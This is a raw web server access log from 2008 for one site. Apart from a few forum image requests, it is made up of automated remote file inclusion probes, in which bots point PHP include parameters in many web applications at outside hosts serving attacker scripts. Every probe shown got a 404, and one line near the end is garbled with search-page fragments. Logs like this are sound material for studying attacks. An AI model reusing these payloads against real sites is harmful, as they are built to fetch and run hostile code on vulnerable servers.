206.190.75.8 - - [11/Jun/2008:10:05:42 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_060M.jpg HTTP/1.1" 200 76230 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
206.190.75.8 - - [11/Jun/2008:10:05:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_072M.jpg HTTP/1.1" 200 25828 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
206.190.75.8 - - [11/Jun/2008:10:05:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_069M.jpg HTTP/1.1" 200 113088 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
206.190.75.8 - - [11/Jun/2008:10:05:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_061M.jpg HTTP/1.1" 200 70278 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
206.190.75.8 - - [11/Jun/2008:10:05:43 -0700] "GET /bikes/dteel/2008-05-30/Panarama_CreSTOC_2008M.jpg HTTP/1.1" 200 14593 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
206.190.75.8 - - [11/Jun/2008:10:05:43 -0700] "GET /bikes/dteel/2008-05-30/CreSTOC_076M.jpg HTTP/1.1" 200 24103 "http://www.st-owners.com/forums/showthread.php?t=42196&page=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:05:50 -0700] "GET /logs/access_080330.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:05:50 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.153.109 - - [11/Jun/2008:10:05:50 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.codinus.com/include/sida6_4.txt?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:05:50 -0700] "GET /logs/access_071213.log//classes/adodbt/sql.php?classes_dir=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:05:51 -0700] "GET /logs/access_071213.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:05:51 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:05:52 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:05:52 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:05:52 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.72.215.178 - - [11/Jun/2008:10:06:07 -0700] "GET /logs/access_080429.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:07:00 -0700] "GET /logs/access_080312.log//claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:07:02 -0700] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:07:03 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:07:06 -0700] "GET /logs/access_080312.log//claroline/inc/lib/event/init_event_manager.inc.php?includePath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:07:26 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.grupslactancia.info/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:10:07:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:10:07:36 -0700] "GET //skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:10:07:40 -0700] "GET /logs/canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:10:07:40 -0700] "GET /canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.77.72 - - [11/Jun/2008:10:07:55 -0700] "GET /logs/canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.77.72 - - [11/Jun/2008:10:07:55 -0700] "GET /canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:08:01 -0700] "GET /logs/access_071218.log//classes/adodbt/sql.php?classes_dir=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:10:08:02 -0700] "GET /logs/access_071218.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:08:16 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:08:16 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:08:52 -0700] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:08:56 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:08:56 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:08:57 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:08:57 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:08:58 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:09:03 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.217.116.153 - - [11/Jun/2008:10:09:15 -0700] "GET /logs/access_080429.log//admin/business_inc/saveserver.php?thisdir=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:10:10:19 -0700] "GET /logs/access_080110.log/index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:10:10:24 -0700] "GET /index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 200 18569 "-" "libwww-perl/5.79" "www.dmulk.com"
211.115.213.236 - - [11/Jun/2008:10:10:25 -0700] "GET /logs/index.php?module=search&q=marks//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.hebronhighband.org/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:10:31 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.217.116.153 - - [11/Jun/2008:10:10:39 -0700] "GET /logs/access_080429.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.infostec.net/ids/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:10:43 -0700] "GET /logs/access_080209.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:10:44 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:10:44 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.58.78.39 - - [11/Jun/2008:10:10:49 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.cdvmbienesraices.com.mx/images/html_f2.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:12:22 -0700] "GET /logs/canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:12:22 -0700] "GET /logs/canal.php?meio=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:12:22 -0700] "GET /canal.php?meio=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:12:23 -0700] "GET /canal.php?meio=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:12:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.160.58 - - [11/Jun/2008:10:13:12 -0700] "GET /logs/access_071225.log//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
209.240.231.154 - - [11/Jun/2008:10:13:20 -0700] "GET /logs/access_080108.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:10:13:23 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.227.103.40 - - [11/Jun/2008:10:13:24 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.136.58.116 - - [11/Jun/2008:10:13:31 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.136.58.116 - - [11/Jun/2008:10:13:31 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.254.63.210 - - [11/Jun/2008:10:13:54 -0700] "GET /logs/access_080118.log//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.254.63.210 - - [11/Jun/2008:10:13:54 -0700] "GET //modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.30.73.117 - - [11/Jun/2008:10:13:55 -0700] "GET /logs/access_080307.log/showthread.php?t=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [11/Jun/2008:10:13:55 -0700] "GET /showthread.php?t=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.30.73.117 - - [11/Jun/2008:10:13:56 -0700] "GET /logs/showthread.php?t=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.254.63.210 - - [11/Jun/2008:10:13:57 -0700] "GET /logs//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.160.58 - - [11/Jun/2008:10:14:02 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
72.55.156.181 - - [11/Jun/2008:10:14:26 -0700] "GET /logs/access_080418.log/index.php?absolute_path=http://freedownloads-free.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:14:38 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:14:38 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
196.28.7.24 - - [11/Jun/2008:10:14:40 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [11/Jun/2008:10:14:56 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:10:15:04 -0700] "GET /logs/access_080228.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:10:15:10 -0700] "GET /logs/access_080223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:10:15:10 -0700] "GET /logs/access_080223.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:10:15:10 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:10:15:11 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:10:15:11 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
213.215.67.3 - - [11/Jun/2008:10:15:12 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:15:27 -0700] "GET /logs/access_080308.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:15:27 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:15:27 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:10:15:32 -0700] "GET /logs/access_080429.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:15:53 -0700] "GET /logs/access_080312.log//claroline/inc/lib/event/init_event_manager.inc.php?includePath=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.80.107.90 - - [11/Jun/2008:10:15:56 -0700] "GET /logs/access_080312.log//claroline/inc/lib/export_exe_tracking.class.php?clarolineRepositoryAppend=http://www.aranytoll.csillagszemek.hu/modules/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.191.38 - - [11/Jun/2008:10:16:18 -0700] "GET /logs/access_080223.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.191.38 - - [11/Jun/2008:10:16:18 -0700] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.191.38 - - [11/Jun/2008:10:16:18 -0700] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.191.38 - - [11/Jun/2008:10:16:18 -0700] "GET /logs/access_080221.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:16:22 -0700] "GET /logs/access_080110.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:16:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.49.254.102 - - [11/Jun/2008:10:16:27 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://ninguem.t35.com/TT??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
67.19.160.58 - - [11/Jun/2008:10:16:31 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
67.19.160.58 - - [11/Jun/2008:10:16:35 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:16:35 -0700] "GET /logs/index.php3?p=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:16:35 -0700] "GET /logs/index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:16:36 -0700] "GET /index.php3?p=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.237.105.23 - - [11/Jun/2008:10:16:36 -0700] "GET /index.php3?p=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.66.242 - - [11/Jun/2008:10:16:38 -0700] "GET /logs/access_080429.log//lostpasswd.php?env[include_prefix]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:16:53 -0700] "GET /logs/access_071215.log%3C/span%3E%20-%20%3Cem%3E125k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.dmulk.com/logs/access_071215.log&w=oneadmin+site+.cn&d=TOVOmZzfQz_b&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.horizonti.com/data.txt%22%20%3Ewww.horizonti.com/data.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20http:/www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?%20...%20http:/2007.cultuurmarathon.nl/site/components/com_web/test.txt?%20...%3C/div%3E%3Cspan%20class=url%3Ewww.horizonti.com/data.txt%3C/span%3E%20-%20%3Cem%3E547k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.horizonti.com/martincarolann/us1:65.35212.34.134.83 - - [11/Jun/2008:10:16:53 -0700] "GET /logs/access_071215.log%3C/span%3E%20-%20%3Cem%3E125k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.dmulk.com/logs/access_071215.log&w=oneadmin+site+.cn&d=TOVOmZzfQz_b&icp=1&.intl=us%22%3ECached%3C/a%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.horizonti.com/data.txt%22%20%3Ewww.horizonti.com/data.txt%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20http:/www.toms-carwash.nl/mailing/oneadmin/upload/read.txt?%20...%20http:/2007.cultuurmarathon.nl/site/components/com_web/test.txt?%20...%3C/div%3E%3Cspan%20class=url%3Ewww.horizonti.com/data.txt%3C/span%3E%20-%20%3Cem%3E547k%3C/em%3E%20-%20%3Ca%20href=%22http:/cache.search.yahoo-ht2.akadns.net/search/cache?ei=UTF-8&p=%22oneadmin%22+Site%3A.cn&u=www.horizonti.com/lingeriestoreusa/us2:64.212.34.134.83 - - [11/Jun/2008:10:16:54 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.34.134.83 - - [11/Jun/2008:10:16:54 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
